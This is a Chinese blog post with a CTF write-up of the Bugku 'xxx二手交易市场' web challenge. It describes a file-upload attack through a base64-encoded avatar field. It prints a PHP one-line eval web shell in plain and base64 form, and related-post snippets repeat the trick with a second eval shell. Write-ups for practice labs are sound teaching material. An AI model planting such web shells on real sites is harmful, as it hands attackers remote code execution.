Bugku CTF 每日一题 xxx二手交易市场

最新推荐文章于 2024-06-21 20:18:52 发布
最新推荐文章于 2024-06-21 20:18:52 发布
阅读量3.4k 收藏
点赞数
分类专栏: ctf 文章标签: 安全 web安全 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42263820/article/details/122548139
版权

xxx二手交易市场

打开看见是一个网站 所以从零开始测试
1.首先点开一个商品 往下滑有回复框 但是要先注册 所以等注册了再来测试
2.搜索栏也不能用 暂时放过,不过在二手界面发现了一个搜索框 输入一般的sql查询发现好像过滤了# ‘’“”等
3.求购 公告栏也没什么可以利用的
4.发现登录注册框 先爆破一下,不过有验证码爆破不行还要识别验证码,先放放
5.先注册一个账号
看了一下功能,先上个商品看看?
在这里插入图片描述
额 要管理员验证 走不通
邮箱签名那块也是有输入验证
再去看看回复框
好像没什么用
在这里插入图片描述
再翻了翻 还有上传头像可以用 打开burpsuite
随便传一个 发现用了base64 先解码看看
发现前面不对劲 有%好像是unicode,所以先丢进unicode
在这里插入图片描述

参考链接:https://www.cnblogs.com/wsh-ning/p/7463101.html

1.形如:"data:image/jpeg;base64,/9j/4QAYRXhpZgAASUkqAAgAAAAAAAAAAAAAAP/sABFEdWNreQABAAQAAAA......==" 的字符串就是base64。

2.data:image/jpeg;base64,为头部信息,其余为图片编码。

3.使用base64_decode对编码内容进行解码。

4. 编码后的数据比原始数据略长,为原来的4/3。因为:三个字节有24个位元,就可以刚好对应于4个Base64单元,即3个字节需要用4个Base64的可打印字符来表示。

所以在后面把图片加一句话码并且要base64编码

在这里插入图片描述
用蚁剑连一下 发现返回数据为空???
研究了许久后发现 tnnd base64网站编译出错了
用下面这个base64就能过

<?php @eval($_POST['cmd']);?>

PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=

用这个就过不了

JTNDJTNGcGhwJTIwQGV2YWwlMjglMjRfUE9TVCU1QiUyN2NtZCUyNyU1RCUyOSUzQiUzRiUzRQ==

过了之后用蚁剑连接 然后用find命令直接找
找到flag
在这里插入图片描述

彼岸花苏陌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
Bugku CTFxxx二手交易市场
花城的博客
01-16 2837
Bugku CTFxxx二手交易市场0x001 wp0x002 结束语 0x001 wp 打开目,点击进入链接,是一个二手交易市场平台 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MtO8UwwV-1642260210908)(https://huacheng1122.cn/posts/973fb9c2/s1.png#pic_center)] 开始想的可不可能是修改购买价格,然后发现根本没有购买功能,只能先登录看看 根据我学过的一丢丢漏洞知识,感觉昵称可能有注入,下
Bugku-xxx二手交易市场-ctf练习(不用菜刀蚁剑)
lshandel的博客
07-17 907
xxx二手交易市场 描  述: 本人现实碰到的目,无提示勿问 (这次目比较牛逼,感觉实战性非常强。。。也挺有难度的) 首先分析一波 突然给我们这么一个网站,那就随便先点点看吧,看到id=的时候dna就动了感觉可能要注入,试了试发现不太行,决定先换个思路,再吸引到我的是注册 注册并且登录之后可以打开个人中心 思路来了,可能能通过图片一句话木马获得shell 然后破解一波 先随便上传一张图片抓个包 这就找到了提交表单的url:http://114.67.246.176:17576/user/upl
Bugku-web-xxx二手交易市场
qq_68457525的博客
06-21 212
cft练习之文件上传漏洞
bugku-web-xxx二手交易市场
qq_75121443的博客
04-09 1297
因为这里发布的填写数据,是可以被我们直接访问到的,如果我们在这些信息中包含一句话木马,是否可以利用菜刀或蚁剑连接呢。这里可以看到,如果头像的一句话木马上传成功,则可以直接访问连接,成功getshell。在当前网站目录下可以看到大量的文件,有一个文件的名称名为flag,打开查看。这里我们抓取上传报文,将这里的image数据给改了,改为一句话木马。好家伙,居然对注释字符进行了过滤,无法闭合,sql注入点不存在。这里看到data这个关键字,即下面的是上面报文加密的状态。发现求购页面是假的,只有二手页面可以点开。
BugKu~二手交易市场文件上传漏洞+一句话木马
xhxtalent的博客
10-20 1357
看到图片类型是jpeg,并且还有base64的加密,我们把一句话木马进行base64的加密并且修改文件类型为php再上传。上传成功,并且返回文件路径,将原始路径+/Uploads/heads/75f940ada20db345.php。到处随便点点看看,有没有什么疑似可以利用的地方。那么上传用户头像,有没有想到上传一个图片马的想法呢!很好我们已经连上了后台,在后台文件里查找一下flag吧。flag也出来了,这次的文件上传也就结束了。打开网站可以看到是一个类似于淘宝商城的页面。引入眼帘的是上传用户头像。
bugku~xxx二手交易市场
o3Ev的博客
03-23 1433
bugku~xxx二手交易市场 打开环境: 页面内的东西很多,这时我们随便点点, 可以看到在url地址栏上出现了id=xxx的字样,我一瞬间想到了sql注入,然后构造了一些payload,发现不行,就继续去找其他的页面了, 我们不难想到这些页面容易发生漏洞的地方-------登陆或者注册页面 这时我们随便先试试注册一个账号,再登陆进去,可以发现来到了用户界面 用户界面一般就可以进行上传头像等,果不其然(真的可以上传头像 既然都可以上传头像了,应该就是文件上传漏洞了,随便上传个图片抓包试试: 可以发现
bugku ctf misc wp.pdf
07-05
根据所提供的文件内容,我们可以得知,这是一个针对“bugku ctf misc wp.pdf”文件的CTF(Capture The Flag)比赛中的misc(杂项)类别目的write-up(解答过程记录)。Misc类别通常包含各种非传统类型的目,要求...
BugKu 2021 CTF AWD 排位赛 真 S2 AWD排位赛-7.zip
12-07
【标】"BugKu 2021 CTF AWD 排位赛 真 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战目,其中的"7"可能代表该赛事的第七个...
bugkuctf-WEB
05-04
本文主要针对"bugkuctf-WEB"这一主,结合描述中的CTF菜鸟的解经验分享,深入探讨Web的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
CTF目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道
最新发布
07-16
### CTF目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
Bugku WEB xxx二手交易市场
qq_41696858的博客
07-08 349
1.打开场景,发现是一个二手交易市场,常用思路是商品信息啥的,后台登录啥的,sql注入啥的,反正一通尝试,发现在注册后更换头像时存在上传漏洞,,抓包改包那么就可以拿到shell,注意这里需要把一句话木马base64编码,data:image/jpeg,可以指定文件后缀,将jpeg改为php后后台就会将其解析为php文件 一句话<?php eval($_REQUEST[8]) ?> 这里要注意,提升上去的system()后面要加;收尾,否则会报错,不知道为啥,大佬可以给个评论 2.据说蚁剑菜刀啥的
ctf bugku 二手车交易市场
YouthBelief的博客
03-08 366
0x00 环境地址 https://ctf.bugku.com/challenges/detail/id/123.html 0x01 解思路 1.1 前台注册账号 1.2 后台头像上传 抓包 上传png后缀图片 url 对post请求包解码 大致为 data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQ
百度杯CTF比赛 九月场——123
夏日 の blog
03-20 1241
目录目描述writeup小结 目描述 writeup 打开页面是一个登录页面,查看源码发现提示语句 访问user.php发现界面为空,此时尝试打开备份文件,发现user.php.bak,下载后发现用户名,根据上述源码提示采用burpsuite爆破,配置如下,注意选取Clusterbomb模式(因为要尝试多个payload,详细见:Burp Suite Intruder4种攻击类型) 三个...
bugku-web-XXX二手车交易市场
m0_57954651的博客
11-01 847
上传成功 然后修改请求体中的内容 仔细观察 它的数据是使用base64加密过的 所以我们上传的木马也要使用base64加密。原本我们上传的为png后缀图片 然后服务器返回的缺失jpeg后缀 请求包中又为jpeg 值。说明可能这里是控制后缀的 那我们修改请求的数据包 jpeg-->php。在这里存在一个上传点 用户的头像 交互时的漏洞。然后我们进行正常的上传 burpsuite抓包。目没给我们太多可提取的信息 打开链接。上传后检测下是否上传成功。观察抓到数据包的信息。
Bugku xxx二手交易市场
m0_63253040的博客
03-13 198
进入环境 是个交易网站,右上角有登录注册 ,先试试 有个头像上传 ,上传一张图片,发现图片被base64加密,直接修改成base64加密的一句话 同时把image/jpeg改成image/php,放包发送,给了上传路径 打开蚁剑连接 在html里的flag里 ...
Bugku web 【四】
weixin_46703850的博客
04-04 1649
Bugku web28.web1929.聪明的php 介绍:记录解过程
BugkuCTF 字符?正则?
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值